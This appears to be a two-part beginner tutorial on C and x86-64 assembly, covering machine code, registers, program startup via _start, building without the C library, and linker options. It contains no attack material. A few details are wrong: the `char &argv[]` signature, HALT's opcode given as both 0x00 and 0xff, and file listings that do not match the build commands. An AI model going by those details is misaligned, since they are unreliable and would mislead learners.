116 | So, in C, things are a bit different. Once compiled, whenever we run our program it will start executing whatever we write in the `main` function. This is how the language was defined. The code inside the `main` function, declares two integer variables (two integer numbers), adds them and then calls a function called `_exit`, passing as parameter the result of the sum.
117 | 
118 | This is pretty much the same thing we have done in ASM some paragraphs above, but using the C programming language. Yes, we removed the `register` keyword here, the compiler will not honour it in the `main` function directly, so, let's forget about it for now.
119 | 
120 | Let's now go line by line for the less experienced readers. Advanced readers can safely skip the next sections
121 | 
122 | ## First Line
123 | The first line found in the program is:
124 | 
125 | ```C
126 | #include <unistd.h>
127 | ```
128 | 
129 | This line is a pre-processor directive. Anything starting with a `#` in a C program is a pre-processor directive. This directives are instruction to a program called `cpp`. This program is run before the actual compilation and it effectively modifies our source code in different ways before it is compiled.
130 | 
131 | > NOTE: Old compilers requires the directive pre-processor be placed at column 0. If you get a weird error message and everything looks fine, try to put your pre-processor directives at the beginning of the line
132 | 
133 | In this case, the `#include` directive, as you can imagine, includes the indicated file at that position in the source code. Not sure what does this mean?. OK, no problem. Let's see what the pre-processor will produce for our program:
134 | 
135 | 
136 |     $ cpp c2-1.c | less
137 | 
138 | Now take a look to `unistd.h`... it is located in the system include folder:
139 | 
140 |     $ more /usr/include/unistd.h
141 | 
142 | Well, that was not a great idea. This file has a lot more pre-processor directives... some that we have not used yet. However, I hope you get the idea. The content of `unistd.h` is included at the `#include` location in our source code... and any other pre-processor directives in that file are processed recursively.
143 | 
144 | Actually, for our simple C program we just need one line (in fact we not even need that, but let's be legal); the prototype of the `_exit` function. If you look for it in the output of the pre-processor you will find something like this:
145 | 
146 | ```C
147 | extern void _exit (int __status) __attribute__ ((__noreturn__));
148 | ```
149 | 
150 | That is the unique line we really need. We will describe in detail what a prototype is and how to use them later in this course. For the time being, you just need to know, that, in order to be able to use a function that is defined outside our C source code, we have to provide the definition for that function... (this is not the complete history but it is enough for now).  In general, what we need to tell the compiler is the return type and number and types of parameters... but we haven't talked about types yet... just keep in mind that you need to tell the computer how the function you want to call looks like and you do that with a function prototype.
151 | 
152 | ## The `main` function
153 | The next line in our C program is the `main` function. As we have already said, this is the function that gets executed whenever we launch our program. The `main` function is usually declared in two different ways.
154 | 
155 | The second one is the one we used in this example. Whenever you are not interested on command-line parameters, you can declare `main` as a function that returns an integer (`int`) and does not receive any parameter (`void`).
156 | 
157 | However, you usually want to access command-line parameters provided by the user. In those cases, the `main` function is declared as:
158 | 
159 | ```C
160 | int main (int argc, char &argv[])
161 | ```
162 | 
163 | You can change `argc` and `argv` for whatever identifiers you want. However those are the names universally used for the `main` function parameters.
164 | 
165 | The first argument `argc` is an integer that indicates the number of command-line parameters the user has provided when launching the application. The `argv` is an array of strings. One string for each space separated parameter provided by the user (unless you quote the parameters). Again, we will talk about this later. Right now, we just need to now that `main` is the function that gets first executed and it can be declared in, at least, two different ways...
166 | 
167 | ## The `_exit()` Function Call
168 | 
169 | The body of the function should be clear by now, so it is only the last line that needs some explanation. The last line is a function call... you will recognize that by the parenthesis. In this case, the `_exit` function is a wrapper around the `exit` system call, provided by the standard C library. Here we see clearly how the standard C library lays on top of the operating system interface, and gives us a simpler interface to access the functions provided by the OS.
170 | 
171 | To my knowledge, there is no standard way to directly access system calls from a C program without using the standard C library. Apparently the old `_syscall` function is deprecated and it is, anyway, a function from the standard C library.
172 | 
173 | In a normal C program, you will usually see the `exit` function to exit a program, instead of the `_exit` that we are using. The first one is a higher level version defined in `stdlib.h` (the standard library header) instead of the, slightly lower level versiondefined in the `unistd.h` (UNIX standard include). Check the man page for `_exit` to know about the differences.
174 | 
175 | In short, `_exit` is the closest we can get to the `SYS_exit` system call from C... it does a couple things less than the standard `exit`. OK, nevermind... we are going to get rid of it anyway pretty soon.
176 | 
177 | # Wait a Second...
178 | So...when I write a C program, my program starts running at `main`, but when I write an ASM program, it starts running at `_start`?... why?
179 | 
180 | That is a good question. Actually, that is not true. In both cases the function/code that gets executed at the very beginning is the one pointed by `_start`. However, a standard C program, does quite a lot of things before the `main` function gets actually executed. And know what...we can actually make our C program look a lot more like the ASM version.
181 | 
182 | What happens is that the linker (do you remember that guy) is adding a default version of `_start` that, at the very end calls our `main` function. This code is contained in a file called `crt1.o`... and sure, we can get rid of it.
183 | 
184 | Let's rename our `main` function to `_start`. Our program will look like this:
185 | 
186 | ```C
187 | #include <unistd.h>
188 | 
189 | void _start (void)
190 | {
191 |   register  int a = 10;
192 |   register  int b = 20;
193 | 
194 |   a +=b;
195 |    _exit (a);
196 | }
197 | ```
198 | 
199 | Now we have to tell the compiler that we do not want to use `crt1.o`. The compiler knows this file (and some other ones used for application start up) as a _start file_:
200 | 
201 | 
202 |     $ gcc -nostartfiles -o c2-2 c2-2.c
203 |     $ ./c2-2; echo $?
204 |     30
205 | 
206 | 
207 | Good. Our program still works the same. We have made it start at `_start` instead of at `main` and, now, it looks a lot closer to our original ASM code. Actually we have achieve a big improvement. Let's produce a static version of our original C code using the start files, and our last version without using them.
208 | 
209 |     $ gcc -static -o c2-1s c2-1.c
210 |     $ gcc -static -nostartfiles -o c2-2s c2-2.c
211 |     $ ls -l c2-?s | awk '{print $9, $5;}'
212 |     c2-0s 737
213 |     c2-1s 872956
214 |     c2-2s 5420
215 | 
216 | Wow... that is a big difference in size!... We are still far away of the size of our first assembly version, but that is not bad. Try to do an `objdump` on the two files produced from C source code to see what's the difference.
217 | 
218 | # The Last Step
219 | There is one last thing we can do, to get even closer to our original ASM code. We can get rid of the C library!
220 | 
221 | If you had paid attention, I said before that we need the standard C library to invoke a system call in a portable way. But what if we do not care about portability?... Yes, we already know how to invoke the `exit` system call from ASM... So, why we do not get rid of the C library and we provide our own implementation for the `_exit` function?. Let's try:
222 | 
223 | So, let's create a new file named `exit.s` and let's declare the `_exit` symbol in there together with our ASM code to call the `exit` syscall:
224 | 
225 | ```nasm
226 |     .global _exit
227 | _exit:
228 |     mov $0x3c, %eax
229 |     syscall
230 | ```
231 | 
232 | This should be pretty basic. You may be missing something... don't you?. Sure. Where is our parameter? Well, it is actually there just because of the standard C **ABI** (_Application Binary Interface_). The ABI defines, among other things, how parameters are passed to functions. We will be discovering it as we go on through this course. For know, it is enough to know that the first parameter we pass to a C function is stored in the `rdi` register (supposing it fits there). 
233 | 
234 | Note that this is for x86 64bits processors. 32 bits and other processor follow different ABIs and the parameters are passed in different ways. This is one of the reasons why it is a bad idea to do what we are doing if we are planing to re-compile our programs for different platforms... This is one of the reasons why the standard C library is there... To make our C code portable.
235 | 
236 | Let's try to recompile our program. We do not have to change anything on the code. We are just going to use our new `_exit` function and tell the compiler to forget about the standard C library (`libc`) version of `_exit`.
237 | 
238 |     $ gcc -static -nostartfiles -nostdlib -o c2-0s c2-2.c exit.s
239 |     $ ls -l c2-?s | awk '{print $9, $5;}'
240 |     c2-0s 737
241 |     c2-1s 872956
242 |     c2-2s 5420
243 |     c2-3s 1341
244 | 
245 | The first thing to note is that the `-nostdlib` flag is the one that let us remove the standard C library. The second is that we can pass assembly source files directly to `gcc`!!!. The third one is that our program that was close to 1MB when we started is now slightly above 1KB!. We have got pretty close to the size of our original assembly version!
246 | 
247 | Actually, if we strip the binaries, the difference of removing the standard C library is not that relevant, but our C version size still doubles the original assembly one:
248 | 
249 |     $ sstrip -z c2-0s
250 |     $ sstrip -z c2-1s
251 |     $ sstrip -z c2-2s
252 |     $ sstrip -z c2-3s
253 |     $ ls -l c2-?s | awk '{print $9, $5;}'
254 |     c2-0s 148
255 |     c2-1s 789552
256 |     c2-2s 589
257 |     c2-3s 369
258 | 
259 | # A Word on the Linker
260 | Before finishing this paper, let me share with you a couple of words about the linker. You may be wondering (I did some time ago) who decides that `_start` is the first function to run, or why my `.text` segment goes to address `0x400000` (again on a 64 bits computer). OK, the answer to all these questions is: **THE LINKER**.
261 | 
262 | You can modify those values using linker flags. For instance, let's change our entry point to `_start1` and put our `.text` segment at `0x500000` instead of `0x400000`
263 | 
264 |     $ gcc -static -nostdlib -nostartfiles -o kk c2-3.c exit.s -Wl,-e_start1 -Ttext=0x500000
265 |     $ readelf -hs kk
266 |     ELF Header:
267 |       Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
268 |       Class:                             ELF64
269 |       Data:                              2's complement, little endian
270 |       Version:                           1 (current)
271 |       OS/ABI:                            UNIX - System V
272 |       ABI Version:                       0
273 |       Type:                              EXEC (Executable file)
274 |       Machine:                           Advanced Micro Devices X86-64
275 |       Version:                           0x1
276 |       Entry point address:               0x500000
277 |       Start of program headers:          64 (bytes into file)
278 |       Start of section headers:          1048800 (bytes into file)
279 |       Flags:                             0x0
280 |       Size of this header:               64 (bytes)
281 |       Size of program headers:           56 (bytes)
282 |       Number of program headers:         3
283 |       Size of section headers:           64 (bytes)
284 |       Number of section headers:         8
285 |       Section header string table index: 5
286 | 
287 |     Symbol table '.symtab' contains 12 entries:
288 |        Num:    Value          Size Type    Bind   Vis      Ndx Name
289 |          0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
290 |          1: 0000000000500000     0 SECTION LOCAL  DEFAULT    1
291 |          2: 00000000004000e8     0 SECTION LOCAL  DEFAULT    2
292 |          3: 0000000000500030     0 SECTION LOCAL  DEFAULT    3
293 |          4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
294 |          5: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS c2-3.c
295 |          6: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS
296 |          7: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 __bss_start
297 |          8: 0000000000500000    38 FUNC    GLOBAL DEFAULT    1 _start1
298 |          9: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 _edata
299 |         10: 0000000000701000     0 NOTYPE  GLOBAL DEFAULT    3 _end
300 |         11: 0000000000500026     0 NOTYPE  GLOBAL DEFAULT    1 _exit
301 | 
302 | As you can see, the `_start1` function is located at `0x500000` that is actually our entry point (check the ELF header just above).
303 | 
304 | As you may have already figured out, the `-Wl,XXX` is the way to feed options to the linker from the compiler. Alternatively you can create `.o` object files and then link manually, passing the options to the linker normally. The same way we did with our first ASM program.
305 | 
306 | You may be wondering now. That's fine... more command-line options. But usually I do not set those command-line options when I compile my programs. Where does all those values comes from?
307 | 
308 | Again a very legit question. I will not completely answer it, but I will give you some hints to get some fun yourself in case you are interested on this stuff. 
309 | 
310 | The first hint is **'linker script'**. It is very likely that you will never see one of those, even if you become a professional programmer. And it is even more likely that you will ever have to write one of those. However, if you go into the world of embedded systems... well, you will surely have to deal with them.
311 | 
312 | The second one is:
313 | 
314 |     $ gcc -o c2-1 c2-1.c -Wl,-verbose
315 | 
316 | 
317 | # CONCLUSIONS
318 | In this part we have learn how to convert an ASM source file into a executable program for the Linux OS. We have also got a basic idea on how to use system calls and also how the program start up process in a C program relates to a similar program written in ASM code. 
319 | 
320 | Finally, we have learn about the main parts of a C program which are automatically and silently added to our code whenever we compile it. We have also seen how the standard library provides a portable and uniform interface for our C programs and how it does hides the platform-specific details to interface with the Operating System. In a sense we have also experienced how this Standard library, stacks on top of the OS, that stacks on top of the _Bare Metal_. 
321 | 
322 | In this trip, we have seen how to strip down a C program to reduce it to its minimal expression... really close to what we can achieve writing our code directly in ASM... and how we lost, in the process, the portability of our code.
323 | 
324 | 
325 | * PREVIOUS: [Programming for Wannabes. Part I. Your first Program](part-01.md)
326 | * NEXT: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
327 | 


--------------------------------------------------------------------------------
/part-01.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part I. Your first Program
  2 | 
  3 | If you are reading this is because you want to be a hacker. Therefore, you are automatically a [wannabe](http://www.catb.org/jargon/html/W/wannabee.html). It does not sound that cool, but it is actually pretty cool. It means that you still have a lot of exciting things to discover!!!
  4 | 
  5 | First things first. This is going to be a joint course on C and assembly programming. Those are the only two languages a real hacker has to know. Yes. Really. The only two languages that will let you do the real hacking. You can do some stuff with Python or PowerShell... but that is Skid stuff.. You know what the S on skid stands for... don't you?. It stands for Script :stuck_out_tongue_winking_eye:
  6 | 
  7 | Easy, this was just a joke to catch your attention. Now seriously. Learning scripting languages is a powerful tool and will save you a lot of time in many cases. Mastering Python is indeed a great skill and it is something you should invest time on. Analogously, C and assembly are the only way forward for some topics: reverse engineering, kernel level rootkits, and some system level programming can only be done with those low level languages. So, if you really want to be a hacker... man, there is no way around, you gotta have to learn CASM (C + ASM :).
  8 | 
  9 | Two notes before we start:
 10 | 
 11 | - I'm not a hacker myself. Not even a wannabe. Really I do not have any interest on becoming a hacker. This basically means that you should take this course as a starting point. When you get done with it... then... your journey will really start.
 12 | - No. HTML is not a programming language. If you think that... you really need to go through this course. :stuck_out_tongue_closed_eyes:
 13 | 
 14 | The course will be organized as follows:
 15 | 
 16 | - Some introduction to what a computer is. These are low level languages and you need to get to know low level stuff
 17 | - That is it for now :P
 18 | 
 19 | # How have you end up here?
 20 | That is a good question. In all honestly there are zillions of C/ASM programming tutorials and courses out there. I know, they look useless. They are not what you are looking for. That's fine... and that is why you are reading this right now.
 21 | 
 22 | To understand why all those tutorials haven't help you, we need to learn a little bit about the different layers beneath the tools we want to build... Yes, layers. There are lots of them.
 23 | 
 24 | So, let's start this trip bottom-up. At the very low level you have what is usually know as the _Bare Metal_. That is roughly the computer processor and the memory. We may consider the BIOS to be also at this level and some other elements usually grouped under the generic name of chipset.
 25 | 
 26 | On top of the _Bare Metal_ we find the _Operating System_. The operating system is in charge of managing the HW. There is a lot to do there and each hardware device has its own peculiarities (that's why we have all those drivers). The operating system gives us standard services to access the disk, the memory, the USB devices... You can indeed do all this at the _Bare Metal_ layer but... then you will end up writing an operating system...
 27 | 
 28 | The next layer we found is the _System Libraries_ layer. These are normal fragments of code that are used for many different programs. We group those pieces of code in a file and we call it a library.  Then we can use that code from our programs. There are literally, thousands of libraries available for any OS out there.
 29 | 
 30 | The top level of this stack of layers are the _Programs_ (this also includes Application Level Libraries). These are the things you want to write yourselves when you decide to learn how to program a computer. You write these programs in some programming language. C and ASM are two of those programming languages... There are hundreds of them, and you should learn quite some and choose the right one for the task you want to accomplish. 
 31 | 
 32 | # Going Top Down
 33 | OK, fair enough. Now that we are at the top level, let's look down for a while. You have learn a specific language. 
 34 | 
 35 | Let's say you have learn C using one of those on-line tutorials. The original C language has 32 keywords. The syntax is pretty simple and easy to learn. Yes, really, is a pretty simple language. However, knowing the C keywords and syntax does not let you do much. 
 36 | 
 37 | You need to learn something more. At least, one thing called the _Standard C library_. Without this, you cannot even print anything on the screen, read any used input or deal with files. And this happens with nearly all programming languages out there. You need a minimal library to be able to interact with your operating system and then, let your operating system deal with the _Bare Metal_.
 38 | 
 39 | Therefore, learning the syntax of a language, and the basics of its standard libraries only brings you half way (in the best case) to where you were aiming to be. 
 40 | 
 41 | Learning C and ASM to become a hacker requires you to learn not just the language keywords, syntax, idioms, (put whatever nowadays buzzword in here)... You also need to learn how to use the system libraries, how does your operating system works and also how does your computer works.
 42 | 
 43 | That is why there is a huge difference between a C programming course that teaches you how to code C and a hacking programming course that teaches you how to do stuff. Usually, after you have learnt the syntax, you have to go into specific courses tutorials: Network Programming, Kernel Programming, 3D graphics programming, GUI programming,... Each one of those has their own peculiarities and requires quite some time to manage them. In a sense we will be covering here what is generally known as _System Programming_. This cover quite some of the topics usually related to hacking.
 44 | 
 45 | Hope that at this point you have understood, that hacking/system programming is not about learning a programming language. That is the simplest part. You have to learn a lot of other things... summing up. You have to learn what is going on every time you type a line of code.
 46 | 
 47 | So, it is time to learn the basics about a computer. C and ASM are low level programming languages. We will see soon how true this is. This means, that, to really master those programming languages you need to know, at least, the basics of how does a computer works.
 48 | 
 49 | # The Simplest Computer in The World
 50 | Despite of how people things technology has advance in the last decades, the reality is that computers haven't change much in nearly 50 years. They are faster, they are smaller, they consume less power... but they still work the same way. Indeed, this is a simplification, but at the level at which we are going to work this is actually the case.
 51 | 
 52 | For illustration purposes, let's introduce the SCTW-2000. This is a fictional computer that will let us introduce different concepts in a generic way. It could easily be one of the popular home microcomputers from the 80s. We will match the SCTW-2000 with real examples, but we will avoid using real computers, at least at the beginning and for the sake of simplicity.
 53 | 
 54 | The SCTW-2000, as many other computers out there is basically composed of two main parts: CPU and memory
 55 | 
 56 | Let's dive into each of these elements to get the big picture.
 57 | 
 58 | # The Memory
 59 | There are a lot of different types of memories: RAM, ROM, SRAM, DRAM, SDRAM, PROM, FLASH, Serial FLASH, ... From a SW point of view, unless we go really low level (something we are not going to do in this course), we do not care about the type of memory our computer have. That is important for the HW guys but not for us. At least not now. What is important for us is how does this element fit within the overall computer architecture.
 60 | 
 61 | For the time being, let's imagine the computer's memory as a huge bunch of drawers, one on top of the other. Inside each drawer we can store one number. An 8 bits number, or in other words, a number between 0 and 255 (that is 2^8 values... 8 bits).  Finally, let's number the drawers, starting for the one on the bottom (number 0), and giving consecutive numbers to the drawers on top. Something like this
 62 |   
 63 |     +--------+
 64 |     + 8 bits | Drawer 3
 65 |     +--------+
 66 |     | 8 bits | Drawer 2
 67 |     +--------+
 68 |     | 8 bits | Drawer 1
 69 |     +--------+
 70 |     | 8 bits | Drawer 0
 71 |     +--------+
 72 | 
 73 | The higher the memory in our computer, the taller the drawer pile will be. For instance, if our computer have 64KB of RAM... yes it sounds ridiculous nowadays, it is just an example. So a computer with 64 KB of memory will have 65536 drawers one on top of the other.
 74 | 
 75 | Each drawer is known as a memory address, and the number inside the drawer is the content of that memory address.
 76 | 
 77 | This is it about the memory for now. Let's look to the CPU
 78 | 
 79 | # The CPU
 80 | The CPU is the other main component of the computer. It is composed of the following parts:
 81 | 
 82 | * A set of registers
 83 | * A Arithmetic-Logic Unit (ALU)
 84 | * Some control logic.
 85 | 
 86 | 
 87 | ## Registers
 88 | Let's start with the registers. You can see the CPU registers as a small piece of memory that is inside the CPU and therefore it is super fast, and can hold numbers bigger than the 8 bits stored in each of our fictional memory addresses. On the other hand, this is a very small memory, something in the range of 4 to 32 positions (drawers). Compare to the 65536 drawers for our ridiculous small 64KB memory.... Each of this positions are known as a register. Registers can be numbered starting from 0 like the memory or they can be named.
 89 | 
 90 | For instance the Z-80 processor, named their registers as: `AF, BC, DE, HL, IX, IY`. The Intel processors traditionally named their registers as: `AX, BX, CX, DX, SI, DI`,... Motorola processor used more systematic naming schema for their registers: `A0-A7` (_address registers_) `D0-D7` (_data registers_) for its 68K. 
 91 | 
 92 | As the number of available registers grows, it is usual to follow the Motorola schema and name the registers with a consecutive number. This way, X86-64 (64 bits intel/amd processors) name their registers (the general purpose ones) `r0-r15` (lower register have names compatible with the i386 processor). Same with MIPS and ARM processor.
 93 | 
 94 | Any way. Most of the processors used to build computers have a set of registers. A very fast and very small memory area inside the processor itself.
 95 | 
 96 | ## The ALU
 97 | The second element of the processor is the Arithmetic-Logic Unit. And yes, it basically performs arithmetic and logic operations. You can add, substract, multiply, and, or, xor values using this processor element... and that is what a computer actually does most of the time.
 98 | 
 99 | The ALU performs this operations either using the values stored in the registers or values taken from the memory, and stores the results, again, either in a register or a memory address. The available options actually depends on the processor. Old processor only could perform operation on registers and some only on certain registers. Nowadays, this is no longer the case.
100 | 
101 | This is really it for the ALU
102 | 
103 | ## The Control Unit
104 | The last part of the processor we are interested on is the Cotrol Unit. In all honesty, in this simplified computer model, the control unit is anything else inside the processor except the registers and the ALU (branch prediction unit, cache management, bus signaling, pipeline management, memory management unit...). We won't go in details about most of those circuitries in this course, however, there are a couple of basic functions that we have to be aware of.
105 | 
106 | One of these things  is controlling the CPU external interface. In other words, the state of all those little pins that go out of the CPU chip. Using these pins, the processor can talk to the memory to read and write values in those drawers and can also interface to different types of hardware...
107 | 
108 | So, when the ALU needs some data from the memory to perform some operation, it asks the control unit to activate the right pins on the processor to command the memory chip to read or write a given memory position. The memory chip will get the value to write from some CPU pines or put the value to read in some other pins (or multiplex these two pin sets, that is using the same pins for reading/writing and even addressing the memory). OK, it does not really work like this, but otherwise we will have a very, very long introductory chapter ;)
109 | 
110 | The control unit is also in charge of reading the program from memory, parsing it and executing the machine code....
111 | 
112 | # Machine Code
113 | We will not talk much about machine code... we will be talking about ASM, but, you at least need to know what this machine code is. For that, we need to understand how the CPU runs a program and how does a program looks like.
114 | 
115 | The first thing we have to introduce is the __Program Counter__ (`PC`) or __Instruction Pointer__ (`IP`). The name depends on the processor family you are working with. This is a special register in the CPU that indicates which memory address in the main memory contains the next instruction to run. Whenever the processor executes an instruction, the `IP` is increased by one (actually it may be more than one, if the current instruction takes several bytes... more on this in a sec), unless the instruction is a branch/jump. In that case, a new value is assigned to the `IP` so the next instruction will be taken from a new position.
116 | 
117 | But, you may be wondering... what are those instructions?. OK, no panic. Let's go back for a second to our fictional SCTW-2000. Now that we know a lot about processors, I can tell you about the specs for the awesome SCTW-2000:
118 | 
119 | - It has 2 registers named `EBX` and `EBP` (you will see later why we have chosen these names), plus an instruction pointer named `RIP`
120 | - The ALU can perform the following operation: `ADD` two registers
121 | - It has an instruction `MOV` to assign values to registers.
122 | - After reset (or on power on) all registers are set to 0 (including `RIP`)
123 | 
124 | Now, to fully specify the SCTW-2000 we have to define the instruction it can run. The numbers the control unit will be able to understand... that is _the machine code_. For the SCTW-2000 it is something like this:
125 | 
126 |     OPCODE     | MNEMONIC    | Description
127 |     -----------+-------------+-----------------------------------------------
128 |     0xbb XX    | MOV EBX, XX | Copies the value XX in register R0
129 |     0xbd XX    | MOV EBP, XX | Copies the value XX in register R0
130 |     0x01 XX YY | ADD XX, YY  | Adds the values of register XX and register YY
131 |                |             | ands stores the result on register XX
132 |     0x90       | NOP         | No Operation. Does nothing
133 |     0x00       | HALT        | Stops the processor
134 | 
135 | As you can see we have used three columns for this table. The first column contains only numbers (1, 2 or 3 numbers depending on the instruction). Yes, instruction may take, and actually take more than one single memory address. This is the __machine code__, the sequence of numbers stored in memory that the CPU can understand.  We have chose some arbitrary opcodes (not so arbitrary but for the time being, it does not really matter which OPCODES we've chosen).
136 | 
137 | Remembering those number is hard for humans. Sure, we can manage for the SCTW-2000, but a real processor may easily have hundreds of those OPCODEs. For that reason, we use something a bit easier to remember for us (that's why this is named [mnemonics](https://en.wikipedia.org/wiki/Mnemonic_(disambiguation)) - from the greek "_memory related_", yes a bit of a free translation)... That is actually the assembly language that you are trying to learn. The ASM language has to be converted into machine code... that is the task of the program know as __assembler__.
138 | 
139 | # Our first program
140 | To illustrate all this, let's write a simple program that adds two numbers: `10` and `20`. The assembly code for the SCTW-2000 and for such a stupid program will be:
141 | 
142 | ```nasm
143 | MOV EBX, 10
144 | MOV EBP, 20
145 | ADD EBX, EBP
146 | HALT
147 | ```
148 | 
149 | Now let's do the work of the assembler by hand using the opcode/mnemonic table above:
150 | 
151 | ```nasm
152 | ASM             MACHINE CODE
153 | MOV EBX, 10  -> 0xbb 0x0a
154 | MOV EBP, 20  -> 0xbd 0x14
155 | ADD EBX, EBP -> 0x01 0x00 0x01
156 | HALT         -> 0xff
157 | ```
158 | Now we can put the program in our memory:
159 | 
160 |     ADDR-07 | 0xff |
161 |     ADDR-06 | 0x01 |
162 |     ADDR-05 | 0x00 |
163 |     ADDR-04 | 0x01 |
164 |     ADDR-03 | 0x14 | 
165 |     ADDR-02 | 0xbd |
166 |     ADDR-01 | 0x0a |
167 |     ADDR-00 | 0xbb | <= RIP
168 | 
169 | Our program requires 8 bytes of memory. We copy the program starting at position 0, and after resetting the SCTW-2000 (sure, we are using SDRAM for the SCTW-2000), the `RIP` will point to address 0 and will start reading the machine code and executing the instructions. 
170 | 
171 | > Not all processor starts execution at address 0. You have to check the datasheet for the processor to figure out the boot process and conditions
172 | 
173 | # C as a Low-Level Programing Language
174 | Before finishing this first part, we have to quickly introduce the other language we are going to work with in this course and we also have to justify why we shall consider C a low level programming language.
175 | 
176 | For doing that, we are going to try to produce exactly the same code we have generated by hand in the previous section, using a C program. Instead of the SCTW-2000, we are going to use an Intel 64bits... You will see how similar these two processors are :)
177 | 
178 | Let's write this program in a text file. Call it `ph1.c`
179 | 
180 | ```C
181 | int f1 (void)
182 | {
183 |   register  int a = 10;
184 |   register  int b = 20;
185 | 
186 |   a += b;
187 |   return a;
188 | }
189 | int main (void)
190 | {
191 |   int a;
192 |   a = f1();
193 | }
194 | ```
195 | 
196 | The program looks a bit weird. The reason is that we are not working at the bare metal level. We have an operating system and a file format to honour, so the compiler has to create quite some more stuff than just the machine code for our code. Moreover, we have to use everything we put in the code, otherwise, the compiler will realise that, and remove the code detected as dead (the one that will never be used)... which is bad for our didactic purposes.
197 | 
198 | We will progressively go into all those details. Right now, it is not really needed to completely understand what is going on. You just need to realize a couple of things.
199 | 
200 | First, concentrate on the function `f1`, at the beginning of the program. No need to fully understand the syntax, just pay attention to the following:
201 | 
202 | * The `register` keyword in C, tell the compiler that we want to use a register. By default it will try to use memory for variables (actually the stack, but we haven't talked about it yet), but, as you can see we can force the compiler to produce machine code that uses the registers... as we did with our assembler version.
203 | * Then you can see the equivalent to our assembler program. We store 10 in one variable (that will be hold in a register), 20 in another, and then we add both number and store it in the first variable. This is roughly the ASM code we wrote before!!!!
204 | 
205 | Let's compile the program and take a look to the machine code:
206 | 
207 | `$ gcc -fomit-frame-pointer -o ph1 ph1.c`
208 | 
209 | The `-fomit-frame-pointer` is just to remove some code generated by the compiler that is not relevant right now. And what we've got out of this compilation is:
210 | 
211 |     $ objdump -M intel -d ph1 | grep -A 20 '<f1>'
212 |     00000000004004b4 <f1>:
213 |       4004b4:	55                   	push   rbp
214 |       4004b5:	53                   	push   rbx
215 |       4004b6:	bb 0a 00 00 00       	mov    ebx,0xa
216 |       4004bb:	bd 14 00 00 00       	mov    ebp,0x14
217 |       4004c0:	01 eb                	add    ebx,ebp
218 |       4004c2:	89 d8                	mov    eax,ebx
219 |       4004c4:	5b                   	pop    rbx
220 |       4004c5:	5d                   	pop    rbp
221 |       4004c6:	c3                   	ret
222 | 
223 | I had kindly asked  `objdump` to produce intel assembly because it's closer to the one we used for our awesome SCTW-2000 (that is the `-M intel` flag).  
224 | 
225 | Let's look at `0x4004b6` to `0x4004c0`:
226 | 
227 |       4004b6:	bb 0a 00 00 00       	mov    ebx,0xa
228 |       4004bb:	bd 14 00 00 00       	mov    ebp,0x14
229 |       4004c0:	01 eb                	add    ebx,ebp
230 | 
231 | So, this looks pretty similar to the machine code, we generated for our fictional SCTW-2000 processor. The main differences:
232 | 
233 | - gcc is generating 32 bits values for our constants. Even if we declare our variables as `char`, a 32 bits value will be generated... Later in the series we will learn why.
234 | - The `add` instruction is a bit different. Intel machine code encodes the registers in the opcode to save space, that is why the machine code for the `add ebx,ebp` is just `0x01 0xeb`, instead of our `0x01, 0x00, 0x01`. Check the intel manual for full details
235 | 
236 | Well, we have managed to write some C code that almost exactly matches the machine code we want the computer to run... this is why C is considered a low level programming language :).
237 | 
238 | # For the Lulz
239 | Just for fun. Let's see how the ASM for ARM will look like.
240 | 
241 | First let's compile the program for ARM:
242 | 
243 | `$ arm-linux-gnueabi-gcc -fomit-frame-pointer -o ph1-arm ph1.c`
244 | 
245 | And now, let's look at the code:
246 | 
247 | 
248 |     $ arm-linux-gnueabi-objdump -M intel -d ph1-arm | grep -A 20 '<f1>'
249 |     Unrecognised disassembler option: intel
250 |     0000840c <f1>:
251 |         840c:	e92d0030 	push	{r4, r5}
252 |         8410:	e3a0400a 	mov	r4, #10
253 |         8414:	e3a05014 	mov	r5, #20
254 |         8418:	e0844005 	add	r4, r4, r5
255 |         841c:	e1a03004 	mov	r3, r4
256 |         8420:	e1a00003 	mov	r0, r3
257 |         8424:	e8bd0030 	pop	{r4, r5}
258 |         8428:	e12fff1e 	bx	lr
259 | 
260 | OK, the OP codes are completely different, but the assembly is pretty accurate. You can see that, for ARM, the `add` instruction accepts 3 parameters instead of just 2. Other than that... it is pretty similar to our SCTW-2000 ASM and also to the Intel 64bits ASM.
261 | 
262 | And for MIPS we get:
263 | 
264 |     $ mips-linux-gcc -fomit-frame-pointer -o ph1-mips ph1-1.c
265 |     $ mips-linux-objdump -d ph1-mips | grep -A 20 '<f1>'
266 |     00400720 <f1>:
267 |       400720:	2402000a 	li	v0,10
268 |       400724:	24030014 	li	v1,20
269 |       400728:	00431021 	addu	v0,v0,v1
270 |       40072c:	03e00008 	jr	ra
271 |       400730:	00000000 	nop
272 | 
273 | This is a bit different but still... change `li` to `mov` and `addu` to add... and there you go.
274 | 
275 | 
276 | # Conclusions
277 | Well, this concludes the first part of this course. We have quickly seen the main components of a computer, and the relation between the machine code, the assembler and the C programming language. We have also seen that knowing the language syntax is just a small part of what you need to know to actually write useful code. Finally, we have checked why C is considered a low level programming language and we've also got a glimpse of how the language can be used to control what is actually executed by the processor.
278 | 
279 | Please, let me know in the comments if you have found this useful, if it is comprehensive, if you are missing something, if you got bored to dead... and click the heart icon if you are interested in more installments for this series (I know some people read the posts but never comment on them)... I won't bother you guys in case you are not interested on this kind of stuff.
280 | 
281 | # Appendix. Installing required tools
282 | In case you need help to get the tools we used in this tutorial, here are some pointers :slight_smile:
283 | 
284 | For intel you can just install  build-essential
285 | 
286 |     apt-get install build-essential
287 | 
288 | This should install all the tools you need, including the compiler. For non debian based distros you need to look for the packages for `gcc` and the so-called `binutils`.
289 | 
290 | Forar ARM things are also easy
291 | 
292 |      apt-get install gcc-arm-linux-gnueabihf
293 |      apt-get install gcc-arm-linux-gnueabi
294 | 
295 | The first one is for Hardware Floating-Point and should work for any recent ARM. Just go for that. You may also need to install the binutils package for ARM
296 | 
297 |     apt-get install binutils-arm-linux-gnueabi
298 | 
299 | For MIPS you won't find a toolchain in your distro repository, so you have to get one from somewhere else or compile your own. Check this page to chose one. I cannot remember which one I used for this post. 
300 | 
